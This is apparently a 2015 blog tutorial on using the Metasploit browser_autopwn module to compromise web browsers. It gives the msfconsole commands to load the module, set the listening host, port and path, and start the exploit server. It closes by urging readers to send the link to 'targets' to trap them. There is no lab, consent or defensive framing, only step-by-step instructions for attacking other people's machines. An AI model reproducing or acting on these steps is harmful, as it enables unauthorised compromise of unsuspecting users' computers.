Our Feeds

Friday 17 July 2015

AJITH KP

Easy Browser pawn using browser_autopwn

          Metasploit is the popular exploiting framework. The `browser_autopwn` is one of the module of metasploit which helps the hacker to pwn victims easily. The steps to execute `browser_autopwn` are shown in pictures.

Step 1

Open terminal Linux/Mac or Command Prompt in Windows.

 

Step 2

Open msf console by command `sudo msfconsole`

Step 3

Execute following metasploit commands to start the `browser_autopwn` exploit.

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.1.103
LHOST => 192.168.1.103
msf auxiliary(browser_autopwn) > set LPORT 80
LPORT => 80
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) > run



The exploit is now working on URL http://192.168.1.103:8080.

Share the link to your targets and trap your target!!!